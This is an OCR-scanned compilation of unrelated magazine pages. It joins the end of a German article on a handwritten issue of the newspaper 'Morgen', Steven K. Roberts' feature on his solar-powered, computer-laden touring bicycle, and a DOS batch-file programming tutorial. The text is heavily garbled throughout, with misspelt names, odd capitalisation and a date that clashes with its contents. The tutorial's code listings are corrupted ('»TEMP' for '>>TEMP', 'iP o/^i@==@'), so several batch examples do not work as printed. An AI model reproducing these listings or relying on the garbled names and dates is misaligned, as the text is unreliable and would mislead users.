alles Geistige handelt. “ Aber auch der 
Umkehrschluß der graphologischen 
Dialektik wurde dem Leser nicht vor¬ 
enthalten: „Diesen Idealismus kann 
man natürlich auch als einen Mangel 
an Realitätssinn interpretieren.“ 

Einen Tag nach Erscheinen der 
handgeschriebenen Nummer des 
„Morgen“ (die übrigens in wenigen 
Stunden ausverkauft war) bringt die 
Post die schriftlichen Reaktionen der 
Leser gleich stapelweise in die Re¬ 
daktion, klingelt das Telefon beinahe 
ununterbrochen. „Es hagelt Glück¬ 
wünsche“, sagt eine der Sekretärin¬ 
nen. „Aber mit Kritik wird auch nicht 
gespart. Die meisten Unzufriedenen 
beldagen sich darüber, daß sie doch 
picht alles entziffern konnten, was in 
der Zeitung stand“, .meint Dpreen 
Espeei, die selbst mit Hand an'den 
Griffel legte und sich daher auch per¬ 
sönlich von dieser Kritik angespro¬ 
chen fühlt. „Insgesamt aber sind die 
Reaktionen überwiegend positiv. Es 
melden sich auch immer mehr 
Sammler, die sich eine solche einzig¬ 
artige Zeitungsnummer nicht entge¬ 
hen lassen wollen.“ 

Dennoch ist sich die Redaktion, die 
nebenbei auch noch gegen Zahlungs¬ 
unfähigkeit und drohende Einstel¬ 
lung des Blattes ankämpfen muß, bei 
allem journalistischem Idealismus 
und der vom Kollegen Computer ent¬ 
fesselten Kreativität darüber im kla¬ 
ren: „So etwas können wir uns kein 
zweites Mal leisten.“ 


noch zwei alte Schreibmaschinen ir¬ 
gendwo verstaubt in einer Ecke der 
Redaktion herumstanden, und auch 
der Versuch, die Zeitung woanders 
drucken zu lassen, war so gut wie 
gescheitert. „Da wäre wohl nicht ein¬ 
mal mehr eine vierseitige Notausgabe 
zustande gekommen.“ 

Viel Zeit zum Diskutieren blieb 
nun nicht mehr. Entschlossen folgte 
die Redaktion dem von Chefredak¬ 
teur . Paul Goossens ausgegebenen 
Motto; „Eine Tageszeitung muß jeden 
Tag erscheinen.“ Nur, wie? In dieser 
brenzligen Situation bestätigte sich 
die alte Binsenweisheit „Not macht 
erfinderisch“. 

„Dem KoDegen Computer 
ein Schiiipj^hen schlagen“ 







^ » ** 




D«r handge>chri«bano „Morgen": Wer schreibt, der bleibt 



Quelle unbekannt 



by Steven K. Roberts 


RURAL OHIO, among the 
JK white clapboard houses and 
autumn maple trees of Christians- 
Mr bürg, the sun glinted off the solar 
panels of my eight-foot-long recunri- 
bent bicycle. I was hunkered over my 
bicycle’s Computer, which was plugged 
into the town's only pay phone, linked 
via satellite with a distant publisher. Tiny 
letters of text scrolied across the liquid 
crystal display screen. 

An old farmer rattied up to the curb in 
his battered pickup, squeaked open the 
door and headed for the M&M Cafe, 
wearing a corn herbicide cap and green 
coveralls. He squinted at me, then at 
the Computer, then at the modern cable 
dangling from the familiär pay phone. 



He looked at the bike, at the Strange 
linkages and Controls, at the blinking 
LEDs — slowly shaking his head at the 
apparition that had materialized in his 
quiet town. Suddenly a look of under- 
sunding lit his craggy features. 

He spat tobacco juice into the weeds 
and peered at me quizzically. "You 
with NASA?" 

I grinned up at him. "Why, yessir, this 
here’s one o’ them Loony Excursion 
Modules . . We sured at each other. 
for a moment like representatives of 
alien cultures, then both laughed. 

The encounter, barely 100 miles into 
an adventure that has now passed the 
11,000-mile mark, sct the tone for the 


whole journey; I am an agent of future 
shock, frolicking in that stränge region 
where the boundaries between tech- 
nology and magic blur. I have finally 
found a job I like; high-tech nomad. 

Freelanclng through the years, I have 
slaved away in bedrooms, living rooms, 
industrial parks, basements, cubicles, 
and posh offices. The same problem 
always surfaced sooner or later — lack 
of change. Sinking into the clutter of 
my own static space, I would turn to 
the Office distractions; redecorating, 
making phone calls, creating new filing 
Systems, fiddling with desk toys, and 
staring at the same old walls. I would do 
anything besides write; even passion can 
be dulied by a changeless environment. 






Steven Roberts uploade a 
day's worth ol writlng Into 
the nearest porl — a roadside 
pay phone. From there It 
travels to a network llke The 
WELL, whare it can be sent 
directly to a typesettlng 
machine, as this article was. 


All the cemlorts of home and 
Office. A tent. A Stove. A 
Computer. A shortwave trans- 
mitter. A CB radlo. Solar- 
recharged batteries. Naturally 
the vehicle Is dubbed 
the Winnebiko. 


My new mobile office is different. It 
materializes wherever and whenever I 
need it — and though there are plenty 
of distractions,’ I never have the same 
one twice. By its very nature, my mobile 
Office is a stimulating place (sometimes 
even a thrilling one), and for the first 
time in my career, working is as at least 
as much fun as playing. In fact, they 
are inseparable. 

I live in a worid that is part bicycle, part 
Computer network, and part kaleido- 
scopic amalgam of lifestyles that span 
the full Spectrum of human behavior. 

My Office is a computerized, 36-speed, 
220-pound, 8-foot-long recumbent bi¬ 
cycle bedecked with solar panels and 
enough gizmology to re-seed Silicon 



Valley after the Big One. While traveling 
full time on this machine, I maintain a 
freelance writing business — the ideal 
way to get paid for playing. With occa- 
sional layovers for major projects, I 
have been doing this since late 1983, 
cranking out some four million pedal 
strokes, and abouc the same number 
of keystrokes. 

This all may sound idyllic and romantic, 
but making such a caper work requires 
much more than chutzpah and leg 
muscles. How can an intense, 
information-oriented business — an ac- 
tivity that depends on word processing, 
photocopying, proposals, filing, business 
planning, invoicing, and all that — be 
operated from a pedal-powered con- 
trivance upon which every ounce 
counts? How can the Illusion of stability 
be maintained when dealing with such 
staid institutions as banks and Insurance 
Companies? And, perhaps most impor¬ 
tant, what are the tools that have 
allowed me to break the chains that once 
bound me to my desk and make a living 
anywhere with virtually no overhead? 

The electronic cottage on wheels that 
Supports my nomadic lifestyle would 
have been impossible as recently as five 
years ago. I harbor over a megabyte of 
memory on board, serving a closely 
linked network of five microprocessors 
that work together in a variety of ways. 
The Systems all run on solar power. 

They roll down the road aboard the 
latest in human-powered vehicle design. 
And they communicate with the rest of 
the Information universe through Com¬ 
puter netwo'rks and packet satellite 
links. My "Winnebiko” grows as 
technology grows, slowly evolving along 
with changes in device physics and Soft¬ 
ware philosophy. 

In a sense, of course, this entire caper is 
a caricature — but it is an instructive 
and entertaining one, applicable to a 


wide ränge of lifestyles and businesses. 

My “Computing Across America” ad- 
venture is a case of personal Computers 
and network communication carried to 
an exquisitely mad extreme. 

INFORMATION FLOW 

The essence of the journey is informa- 
tion. I inhale it, störe it, fiddle with it, 
and disgorge it in the endless attempt 
to keep myself alive in the mercurial 
freelance writing business. This is an 
ideal enterprise for a nomadic general¬ 
ist, of course, for everything is copy 
(and words have no mass). 

But writing on the road turns out to 
be an interesting challenge, particularly 
when the load-carrying capacity is that 
of a bicycle instead of a motor home. 
Cassette dictation is a pain, yielding 
non-editable speech that never seems to 
get transcribed. Stopping to jot notes is 
too much trouble. It has to be electronic. 

Düring my first 10,000 miles, 1 carried 
only one Computer, Though it was an 
astonishingly robust System (the Hewlett- 
Packard Portable PLUS), 1 still couldn’t 
write while riding. Since 10,000 miles 
corresponds to roughly 1,000 hours of 
pure pedaling time (half a business year), 
this is no small matter — I had far too 
many days of good ideas, good inten- 
tions, and no work output. 

What 1 needed in addition to the HP 
was a bike-mounted System, an elec¬ 
tronic web to capture my ideas like 
passing butterflies and störe them for 
later processing. I wanted to find a 
machine that would support word pro¬ 
cessing, long-term file storage, daily 
electronic mail, and a number of other 
information-processing functions . . . 
all on the bicycle itself. 

But commercial Computers were made 

for desktops, not biketops. 1 took a_ 

year’s sabbatical from the road and 
dedicated myself to building a different.^^ 








Reiembling Ih« 
iflstrument pane! ol 
a 0*52 more Iban a 
bIcyciB. Mlsjton 
Control iS withln 
arm’s isngtb. 


my hospitality dacabase. a list of 2.500 
contacts retrievable by name, location, 
etc.), but its primary use is textual. 

Whcn l’m on the road, everything 
changes. As ideas flow from the rhyihm 
of pedals. the depth of breath, and the 
sweet sensations of movement, my 
fingers dance a quiet staccato on the 
handlebars. They move as if playing the 
flute, pressing combinations of eight 
Waterproof Weys to yield any of 256 
binary Codes —a convenient handlebar/ 
keyboard that will type both letters and 
Control characters. Up in the console, 
the bicycle control processor reacts — 
decoding the incoming data into a modi- 
fied Radio Shack Mode! 100 with 256K 



Tratellng wilti a 
companion eases tha 
stress ol a plotteetitig 
llleslyle. On-boar(t CB 
raillos help comitiuni- 
cats on the road. 




System. The original Intention — being 
able to type white riding — quickly 
cvolved into a complete bicycle control 
and Communications System — not only 
turning the Winnebiko into a mobile 
Office but also starting so many on-the- 
street conversations that anonymity has 
become impossible. (That's half the fun. 
of course. given the research potential 
of social contacts.) 

The principles are simple enough. The 
bike carries five Computers, networked 
together in ways that vary as a function 
of the type of work in progress. When 
l'm not pedaling. the only one in use is 
HP — an exquisite machine with 
896K, electronic disk, and applications 
Software baked into ROM. Articles or 
book chapters become files, which are 
then transferred from the first available 
telephone to my Ohio office via elec¬ 
tronic mail on the GEnie Computer 
network (this article, however, was 
e-maiied through The WELL). The HP 
performs other jobs (such as managing 


of memory. The net effect: smooth, 
machine-readable text captured while 
l’m on the road. yielding files that can 
be downtoaded to the HP for fine tuning 
and subsequeni transmission. 

Bike writing was the main motive, but 
with all that solar-powered processing 
horsepower on board, it was inevitable 
that a few other functions would emerge. 
The battery-charging process is now 
under Computer control. as are the 
security System, seif diagnostics, elec¬ 
tronic compass, and more. A fourth 
processor handles Speech Synthesis (it 
can read text files out loud and explain 
itself to curious passers-by); a fifth 
manages packet data communication via 
two-meter ham radio. The term elec¬ 
tronic cottage on wheels is by no 
means frivolous, and as the trip pro- 
gresses, other projects slowly get done 
(or at least started) - for no complex 
System is ever 100 percent complete. 

l-m atready plotting the development of 


the new. improved Winnebiko III — a 
Chance to obsolete all this dedicated 
hardware I jüst spent eight months 
building and replace it with soft Instru¬ 
ments . . . a User Interface not unlike 
the Macintosh (under control of a field 
mouse, no doubt). The displays and 
Controls most important to the task at 
hand should be the ones that move into 
visual prominence on the console — 
with pull-down Windows to invoke 
related functions (even satellite navi- 
gation and CD-ROM maps). We have the 
technology. The only missing links are a 
low-power. high-resolucion display and 
another year of my time. 

THE NETWORtC CONNECTION 

Full-time bicycle touring raises an in- 
teresting issue. What, in the words of 
Alvin Toffler. can a traveler use as an 
“enclave of stability" while wandering 
endlessly across the earth’s surface? The 
bike itself. whilq deeply familiär and 
"home" in many ways, is not enough 
to satisfy that basic need. 

My enclave of stability is found on 
the networks — a stränge amalgam of 
satellite and bicycle, cloud and soll, a 
place that is no place yet is everyplace 
at once. Give me a telephone and l'm 
home: all it takes is connection of the 
Computer and a few typed commands 
and I cross that familiär threshold, see 
the GEnie sign-on messages that let me 
know l’m Inside. Beyond those electronic 
portals I meet my dosest friends. keep 
up with the activities of my Ohio office, 
publish weekly iravel tales, seek help 
with arcane technical Problems, find kin¬ 
dred spirits, and sometlmes just hang 
around bantering with other vaporous 
deniiens of the network — Intellectual 
projectiOns of real humans sitting some- 
where on Earth. I wander freely in 
physical space, returning to my stable 
home in Dataspace night after night 
for stability and security. 

This is central to the journey, for it 
provides daily communication without 
those traditional Wanderers’ hassles 
of general-delivery mail and telephone 
tag. I have an assistant in Ohio named 
Kelly, who is my full-time universe Inter¬ 
face ("that means I pray for him," she 
explains, only half-joking). All com¬ 
munication Is funneied through her; 
business correspondence is processed 
and reported online; personal letters are 
held for the next "matter transfer" 
event; phone calls are forwarded elec- 
tronically. She handles money, prints and 
mails manuscripts to offline publishers 
and keeps old friends up to date on my 
activities. Kelly is my link to business 
reality, GEnie is my link to Kelly, and 
the HP Computer System is my link to 
the network. 


And home is wherever 1 happen to be 
— as long as there’s a telephone nearby. 













BIKE ELECTRONICS 

The Computers are just part of the 
Winnebiko System, though their direct 
influence extends into every Corner and 
their complexity has required an on- 
board microfiche documentation library. 
Of nearly equal value, from the lifestyle 
Standpoint, is the Communications gear. 

liy mobile ham radio Station (call sign 
KA80VA) is a multimode two-meter 
transceiver made by Yaesu. In addition 
to handling packet data satellite com- 
munication (see WER #50, p. 47) with 
the aid of a Pac-Comm terminal node 
Controller, it allows me to stay in regulär 
voice contact with my travelihg com- 
panion, Maggie (KA8ZYW). (Sharing a 
bicycle tour without some form of 
communication is frustrating, as anyone 
who as ever squinted into the mirror 
for minutes at a time well knows.) With 
a boom microphone built into my Bell 
helmet and a push-to-talk switch on the 
handlebars, Maggie is never far away 
(effective bike-to-bike Simplex radio 
ränge is about two miles). 

Of course, having two-meter FM. capa- 
bility on the bike also connects me to a 
vast network of ham radio operators. I 
Store the local repeater frequencies in 
the radio’s memory as I approach an 
area, and periodically identify myself as 
an incoming bicycle mobile. Range in 
this case Is upwands of 25 miles, since 
repeaters are generaliy in high-profile 
locations, This has led to a number of 
interesting encounters, and the auto- 
patch Systems often let me make 
telephone calls to non-hams directly 
from the bike. 

A CB radio Is also on board, culturally 
useless by comparison.but still valuable 
enough to justify its weight. I can talk 
to truckers, hail a passing motor home 
for water (this saved my life in central 
Utah), and shake my head at the idiomatic 
yammerings of the residual good-buddy 
subculture that hung on after the death 
of the great CB boom. 

System security is as imporunt an issue 
as survival when living on a machine that 
looks like a rogue NASA Creation of in- 
calculable value. But it's not that people 
try to steal it — most are intimidated by 
the technology — it’s just that some let 
their curiosity extend to flipping switches 
and occasionally even climbing onto the 
seat and bending the kickstand. To alert 
me to such rüde behavior, I added a 
paging security System with Vibration 
Sensors; when armed by a front-panel 
keyswitch, detected motion causes it to 
transmit a tone-encoded four-watt 
Signal that triggers my pocket beeper 
up to three miles away. 

Other radio-related devices include a 
Sony digital shortwave for international 
broadcast reception, a Sony Watchman 
micro-TV, and an FM Stereo. Naturally, 


there Is also an audio cassette deck, and 
a compact disc player is planned for 
under-dash installation soon. With this 
load, it sometimes takes a lot more 
than the usual granny gears to climb 
a mountain. 

Then there Is the matter of power. All 
the equipment described so far, plus 
behind-the-scenes control circuitry, 
requires electricity — in six different 
voltages. A pair of lO-watt Solarex pho- 
tovoltalc panels serves as the primary 
source, providing about 1.3 amps to the 
12-volt SAFT Ni-Cad batteries under 
ideal conditions. The charging process 
can be digitally monitored from the 
front panel, and the bicycle control 
processor intervenes if its calculations 
suggest that the batteries are in dangen 
of overcharging. When too many cloudy 
days occur back-to-back, a power supply 
with line cord allows refueling from 
house current. 

Generating the other voltages is a com- 
plex issue, but suffice it to say that new 
"Switching power supply” devices have 
made high-efficiency voltage regulation 
relatively easy. The subsidiary supplies 
are switched in and out of standby mode 
as needed, and their Outputs are available 
on the front panel to power tent lights, 
small radios, and similar accessories. 

Other front-panel Instrumentation 
includes the obligatory Cat-Eye solar 
bicycle Computer to display speed, 
distance, cadence, and so on. This is 
flanked by an altimeter, a two-line LCD 
for the Etak electronic compass and 
other sensors, time and temperature 
display, and assorted Status indicators. 

THE BIKE ITSELF 

Everything described so far has to be 
light, protected from Vibration, kept dry 
even in the nastlest weather, and easy 
to repair on the road. Those require- 
ments are added to an already stringent 
set of demands on the bicycle. for the 
total System (including my body) weighs 
400 pounds. It must be pedaied up 
steep grades yet stop quickly; it must 
not oscillate under any conditions; it 
must withstand che ongoing abuses of 
weather and grime and shock and salt 
and overlooked maintenance. 

It had to be a recumbent, of course. 
Long-distance touring while hunched over 
one of those old-fashioned diamond- 
frame machines has always seemed 
masochistic, a ritual pursuit that drives 
aesthetics to the most remote fringes 
of a traveler's awareness. People can 
overcome almost anything, but why sub- 
mit willingly to hundreds of hours of 
acute discomfort? 

The recumbent riding position not only 
allows greater power to the pcdals, but 
also eliminates all the traditional cycling 
sore Spots (shoulders, neck, crotch, and 


ass). As an added benefit, I can actually 
see the lands l’m riding chrough — look- 
ing around from my lawn-chair-on-wheels 
while those on diamond frames Stare 
down at the road. And on top of all 
that, the recumbent can carry more (try 
220 pounds plus rider on a regulär bike). 

But none of the few commerciai re- 
cumbents offered the right combination 
of features and quality, so in the summer 
of 1983 I began building one in my old 
suburban Ohio basement. I quickly 
learned that frame building is a complex 
art form and turned for help to Franklin 
Frames of Columbus, an outfit wich 
long experience in making tandem bike 
frames. "Hey, can you give me a hand 
with this!" I asked, gescuring at my 
crude brazing job. 

"Uh . . . maybe we should Start over." 

Good advice. The resulting machine was 
designed for full-time, heavily loaded 
touring, with thick-wall, chrome-moly 
tubing, triple rear stays, tandem-style 
crossover drive, wide-range gearing 
(later expanded to 36 speeds), and a 
48-spoke undished rear wheel with disc 
brake. The handlebars are under the 
seat, with a linkage of stainless Steel 
tubing cönnecting them to the front 
fork and its 16-inch custom wheel. A 
stock seat from Infinity Recumbents 
was mounted with machined aluminum 
blocks, and the entire machine was fitted 
with braze-ons to support my unusual 
needs. I took it from there — using the 
bike as a Substrate for the trappings of 
my life, changing form every year or so 
as new technobgies become available. 

And 11,000 miles later, it’s still rolling 
— a bit worn in places, modified here 
and there — but as solid and dependable 
as ever. 

All of this taken together yields a re- 
markably liberating System, providing 
not only the tools to work anywhere 
but enough media Interest to keep che 
writing Business growing. The whole 
affair is a cultural door-opener — at- 
tracting interesting people in every town 
and keeping me well provided with story 
material and personal satisfaction. It’s a 
freelance writer’s dream; a self-sustaining 
existente of tax-deductible, full-time 
research and subsequent storytelling. 

For a confirmed generalist, the com¬ 
bination is so addiccing that ending 
the journey may be impossible. 

I’m often asked how far, how fast, how 
many States, how long. The frequent 
questions along these goal-oriented 
numerical lines are hard to answer prop- 
erly on the Street: I am here. Period. 
Tomorrow I might be somewhere eise 
(probably further south since it’s winter), 
but maybe l’ll still be here — who 
knows! If you think too much about 
where you’re going, you lose respect 
for where you are. ■ 


)»nii Miglat» 



Wherever you on, 
and whflrsvor I om, 
wo'fu noighbors in 
dataspaco. If you 
wanf to talk about it 
(or add yoursolt to my 
hospitality database], 

I can be reachod 
through my homa nat* 
work addres^ed at 
"wordy." (For GEnie 
slgn-up into. call 
800-638-9636.) I also 
cbsck Into Compu¬ 
Serve every lew 
waaks (my id there is 
72757, 15) and hne 
just beguntentaliva 
long-distance eiplors- 
lion ol The WELL 
(again, as '"wordy." 
Diai 415-332-6106). 
Throw another logon. 


whole EARTH REVIEW SPRING 1997 


27 GATE FIVE ROAD SAUSALITO, CA 9496S 



PROGRAMMING 


Batch itic#; 

DOS batch Processing i s notoriously slow, but it does have its uses. 
John DeHaven provides a c ompendium of tricks, techniques_ and 
' curiosities for your reference. 


What is the world's slowest inter- 
pretative language? This dubious 
honour surely belongs to DOS batch 
Processing, which runs like granny. 
Let's go ahead and Stretch a point 
and call DOS batch processing a lan¬ 
guage. It is usefui to think of the 
Statements of this language as in- 
cluding the traditional batch Proces¬ 
sing commands, all DOS commands j 
and the names of any executable 
files (including other batch files) that 
are available in the default directory 
or via PATH. 

Unfortunately, even if we gener- 
ously expand the definition in this 
way, DOS batch processing still isn't 
a complete language, since it is not 
interactive and cannot add or even 
count. Even so,if you hold your jaw a 
certain way there is plenty of unsus- 
pected power to be found. We'll ex- 
plore generation and passing of vari¬ 
ables, file Creation, true calls with re- 
turn, giant loops under control of 
'FOR' and recursion. Batch proces¬ 
sing is not really as boring as IBM 
and Microsoft try to make it seem. 

The traditional (IBM/Microsoft) dis- 
cussion lists only six batch proces¬ 
sing commands, and we'll assume 
you have a working knowledge of 
these; ECHO, FOR, GOTO, IF, PAUSE, 
rem and SHIFT. Of these, ECHO is 
usefuI outside of batch processing, 
and FOR can be used outside batch 
processing to do some non-trivial 
things. Four other commands, COM- 
MAND, CLS, EXIT and SET — are not 
usually mentioned as pari of batch 
processing, although they would 
rarely be used anywhere eise. We 
will use them all here. 


Speed 


One reason batch processing runs so 
slowly is that it makes a disk call for 
each line of code. Evidently then, a 
given batch file will run faster if you 
can reduce the number of lines in it. 
After you have a batch file running, 
you may be able to reduce the num¬ 
ber of lines by combining some of 
them in a FOR structure. The follow- 
ing rules apply: 

1 If Statements have no argument, 
they may be combined; 

2 If Statements have the same argu¬ 


ment, they may be combined; and 
3 Statements with the same argu¬ 
ment may also be combined with 
Statements with no argument. 

Here are some examples to illus- 
trate the above points: 

FOR %%A IN (CLS VER VOL BREAK 
VERIFY SET) DO %%A 
FOR %%A IN (CLS A: ECHO PAUSE 
CLS) DO %%A Insert back-up 
diskette 

FOR %%@ IN {CLS C; IF A;) DO 
%%@ EXIST PP. BAT PP 
FOR %%@ IN (MD CD) DO %%@ 
\SDIR1 

These work because certain com¬ 
mands like CLS and PAUSE (and cer¬ 
tain other executable files you might 
have created) do not take any argu- 
ments, so when FOR expands them 
with an argument, the argument is 
ignored. 

Batch files will run much faster if 
you allocate extra 'buffers' with 
CONFIG-SYS. Briefly, this specifica- 
tion allocates memory for disk I/O, 
one buffer per duster read from dis¬ 
kette. When a disk call is made, these 
buffers are checked first, and if the 
record is already here, no physical 
disk reference will be made. The 
overhead cost is about 1k per buffer 
{not 512k as IBM States), above the 
default two buffers. Here is how you 
can be sure you have those extra 
buffers activated; 

1 The disk from which you boot 
must contain a file calied; 
'CONFIG.SYS.' 

2 This file must contain the State¬ 
ment: 

BUFFERS=9 

although a (arger number will be 
OK 

3 For good measure, include the fol- 
lowing two lines; 

F1LES=99 
DEVICE =ANSLSYS 
The first of these will allow a much 
(arger number of file handles to be 
opened than the default eight, at a 
cost of only 3783 bytes of memory. 
Many programs need more handles 
than eight, and you'll be dis- 
appointed in the performance of 
some of the following examples if 
you don't allow this extra latitude. As 
for the assignment of the ANSI.SYS 


driver, 1 can't imagine anyone with 
more than 16k of RAM not waTiting 
this, because it allows control over 
screen colours and attributes, arbit- 
rary Cursor positioning and even 
keyboard reassignment {16-character 
keyboard macros at the DOS level 
without a fancy program!) 

If you are echoing many lines to 
the display, you will find that it is 
much faster to put in a single line to 
TYPE a file that contains your multi- 
line display. This will cost some disk 
space, since you will have to create 
this extra file. I usually denote such 
files as .SCR (for 'screen') files. 

If you use labels in a batch file, 
those that are most likely to be calied 
should be put near the beginning, as 
the batch processor scans the entire 
file from the beginning every time it 
looks for a label. 

Control 

Whether you use ANSI.SYS or not, 
the display understands the sequ^ 
ence ESC-1-2-J to mean 'clear the 
screen'. The CLS command in fact 
sends just this sequence to the 
screen. This means that you can in¬ 
clude this String in any Statements 
you ECHO to the display and in any 
file that you might TYPE to the dis¬ 
play. If you write your batch files 
with an editor that allows the Inser¬ 
tion of the ESC Code, you will be 
able to echo ANSI control sequences 
from the batch file. Some very nice 
effects are available. If we let the ex- 
pression stand for the ESC Code, 
the sequence 
CLS 

ECHO [[2Jlnstall the back-up 
diskette in drive A."G*[[5m 
PAUSE 

ECHO'l[2K“[10;lm 

will clear the screen and display the 
prompt message followed by a beep 
and a blinking pause message. When 
a key is struck, the blinking pause 
message is wiped out. 

You could output blank lines with 
ECHO followed by two or more 
spaces with DOS 2.x, but this no lon- 
ger works with DOS 3.x. The sequ¬ 
ence ESC-space-<255h> will work 
with DOS 3.x, the idea being to echo 
the invisible character 255 hex. On 





an IBM machine you can get this 
character if you hold the ALT key and 
press 2-5-5 on the numeric keypad. 
On other machines, or with certain 
editors, the procedure may be diffe¬ 
rent. 

You may want to shut up the dis- 
play at some stage. To do this you 
set ECHO OFF so that you won't see 
the batch procedure running, but cer¬ 
tain commands still natter at you. 
The bit bücket 'file' NUL may be 
used for this. If your file contains the 
Statement 

DEL *.BAK>NUL 

then it will attempt to delete all Back¬ 
up files. If there are none, the error 
message will be redirected into the 
97th dimension and will not be seen. 
You could also get the effect with the 
Statement 

IF EXIST *.BAK DEL *.BAK 
but this would require a bit of extra 
time for the existence test. IF EXIST 
only Works for files in the current 
drive and directory, which is some- 
times a bother. 

Variables 

There are four kinds of variables in 
batch Processing. %0 returns the 
name of the batch file itself while 
%1, %2, %3 represent tokens passed 
in on the command line after the 
name of the batch file. %%A, where 
'A' may be any character, is the form 
of a variable that takes successive 
values of the 'IN' portion of a FOR 
Statement. 

The usual literature does not make 
it obviöus that a variable in the form 
%WORD% will return the value of a 
variable calied 'WORD' that has been 
set into the 'environment'. To install 
such a variable, you execute a com¬ 
mand, in or out of a batch file, of the 
form 

SETVAR=SOME STRING 
where VAR is the variable name, and 
the value is any string. 

To see how SET works, try the fol- 
lowing batch program. 

ECHO OFF 

SET X=NOT 

ECHO THIS DOES %X% FAIL. 

SETX= 

ECHO THIS DOES %X% FAIL 
These variables set into the environ¬ 
ment are made available to all ex- 
ecutable programs, and this is how 
they are accessed by .BAT programs. 

Often you may need to control 
batch file behaviour according to 
whether a variable exists or not (re- 
gardless of its value). The IF State¬ 
ment does not directly test for this; 
you must supply some minimal 
String on both sides of the '==' 
operator. I'll use a minimal string of 
'@' to Show the two basic kinds of 
existence tests. 

Executes if the variable %1 exists: 

IF NOT %1@==@ ... 

Executes if the variable %1 does not 
exist: 

IF %1@==@.-.. 


Later we'll see some other uses for 
these techniques but, as an example, 
suppose you have a program that 
becomes memory-resident when cal¬ 
ied, and if calied again will install 
another copy of itself, gradually eat- 
ing up your available memory (some 
otherwise excellent commercial pro- 
ducts have been known to behave 
like this). The program is not used 
every day, and is too large to install 
no matter what with AUTOEX¬ 
EC.BAT. What you need is a batch 
program that calls this maverick 
program if it is needed, but only 
once per session. Let's suppose our 
resident-type program is calied 
DBSORT. A batch file fragment that 
would do the trick might be: 

IF NOT %SORT%@= = 

INS® DBSORT 

IF NOT %SORT%@= = 

INS® SET SORT=INS 

After DBSORT is instalied once, the 
variable SORT is set to INS in the 
environment and, therefore, DBSORT 
will not again be calied until the 
machine is rebooted. 

Creating a file with a 
batch file 

The command 'ECHO This is a test 
message >TEST.TXT' will create a 
one-line file named TEST.TXT which 
contains the words This is a test 
message'. One reason to do this 
would be to set a flag that will last 
between sessions. Things set in the 
environment go away with the pow- 
er, but a temporariiy-created file will 
not, and its existence may be tested 
by the IF EXIST Statement of batch 
Processing. Your AUTOEXEC.BAT 
might want to set up a large print 
Spooler if you have a dot-matrix prin- 
ter instalied, and omit the spooler if 
a daisywheel unit is attached. The 
following Statement in AUTOEX¬ 
EC.BAT would do it, based on the 
existence or not of a file calied 
DAISY. 

IF NOT EXIST DAISY BIGSPOOLyi28 

At some point in your configura- 
tion procedure you could create the 
flag file if required with the State¬ 
ment: 

ECHO Daisywheel Printer 
installed>DAISY 

You can create a temporary file 
and then use the temporary file to 
answer a question. Two commands 
that are hard to automate are DEL 
and PRINT, because under certain 
conditions they ask questions of the 
User. The following batch sequences 
will proceed without pause: 

ECHO Y >YES 
DEL <YES 
ECHO LPT1 >PSPEC 
PRINT %1 <PSPEC 
DEL PSPEC 

In each case, if the procedure asks 
a question, it finds a file waiting with 
the answer, and it takes the answer 
from the file. 


A multiple line file may be written 
a line at a time, by using the '>>’ 
operator, which adds a line to a file. 
'»' creates the file if it doesn't yet 
exist. The following sequence writes 
a three-line file (try it). 

DELTEMP 

ECHO This is the first line 
»TEMP 

ECHO This is the second line 
»TEMP 

ECHO This is yet another line 
»TEMP 
TYPE TEMP 

You could even write another 
batch file this way and then execute 
it! Here is how to create a program 
that keeps an activity log. First create 
a file that contains only a carriage 
return and a line feed by the follow¬ 
ing procedure: 

COPY CON CRLF.BAT <return> 
<return> 

<CTRL-Z> <return> 

We've named this weird little file 
CRLF.BAT because there is another 
important use for it that we'll discov- 
er below. One use for this will come 
clear if you try 
DATE <CRLF.BAT 
and then 

DATE <CRLF.BAT >LOG 
TYPE LOG 

This, then, would be your activity log 
program fragment. It records a date 
and time in file LOG whenever It 
runs: 

DATE <CRLF.BAT »LOG 
TIME <CRLF.BAT »LOG 
For maximum speed we compress 
this to: 

FOR %%@ IN (DATE TIME) DO 

%%® 

<CRLF.BAT »LOG 
You could also use this technique 
to put data in a file. Below we will 
see how a batch file could read such 
data. 


Chaining 


As is well-known, if you name 
another batch file in a batch file, the 
next batch file begins executing, ln 
this way batch files may be chained. 
This chaining can be used to cause 
an abrupt exit from a long batch file 
that runs slowly. Suppose the batch 
file has the following structure: 
:LABEL1 

<FIRST PROCEDURE> 

GOTO EXIT 
:LABEL2 

<SECOND PROCEDURE 
GOTO EXIT 


:LAST LABEL 
<LAST PROCEDURE> 

:EXIT 

This is likely to execute slowly be¬ 
cause after any given procedure is 
executed, EXIT is calied and the 
batch processor must read the whole 
file from the beginning to find the 


label in the very last line. If the do- 
nothing file CRLF.BAT is still avail- 
able to DOS, the preceding program 
may be considerably speeded up by 
writing it in the following forrn; 
;LA,BEL1 

<FIRST PROCEDURE> 

CRLF 

;LABEL2 

<SECOND PROCEDURE 
CRLF 


iLASTLABEL 
<LAST PROCEDURE> 

Now, instead of searching the file 
for ";EXIT", the program will directly 
Chain to CRLF and abruptly quit. 


DO %%@ LOOP 

Soon we'll see a more advanced 
application of this principle. You can 
also use the command-line tokens as 
items to be counted. Write 
TEST.BAT; 

ECHO OFF 

CLS 

;DO 

ECHO Display for token %1 
SHIFT 

IF NOT %1@==@ GOTO DO 
Run TEST with several calls to see 
this work. 

TEST 

TEST 1 2 3 
TEST XXX 

TEST NOW THREE WORDS 
TEST 1 TWO 3 2+2 5 6 7 8 9 TEN 11 


Using SHIFT 


Batch procedures 


There are two good uses for the 
SHIFT command; to allow an indefi¬ 
nite number of command line Para¬ 
meters and to count. Suppose you 
have a print formatier calied 
PRT.COM. You could feed several 
files to it with a batch file containing 
the following: , , ^ 

FOR %%@ IN(%1 %2 %3 %4 %5 
%6 %7 8% 9%) DO PRT %%@ 

This is fast enough, hut is limited to 
nine arguments. This little program 
will accept unlimited arguments, us¬ 
ing SHIFT: I 

:D0 

iP o/^i@==@ goto ENDDO 
PRT %1 
SHIFT 
GOTO DO 
:ENDDO 
or quicker: 

:PR0C 

iP goto ENOPROC 

PRT %1 

FOR %%@ IN(SHIFT GOTO) DO 
%%@ PROC 
:ENDPROC 

This is the most general form that 
will not execute if there are no argu¬ 
ments. A shorter (and therefore fes¬ 
ter) Version of this basic loop may be 
used, but this form will execute at 
least once, even if there are no argu¬ 
ments. Use it by all means if this 
does not matter. 

••LOOP 
PRT %1 
SHIFT 

IF NOT %1(a = =@ GOTO LOOP 
or quicker: 

:LOOP 
PRT %1 

for %%@ IN(SH1FT IF) DO %%@ 
NOT %1@= = @ GOTO LOOP 
If we can use CRLF.BAT to break 
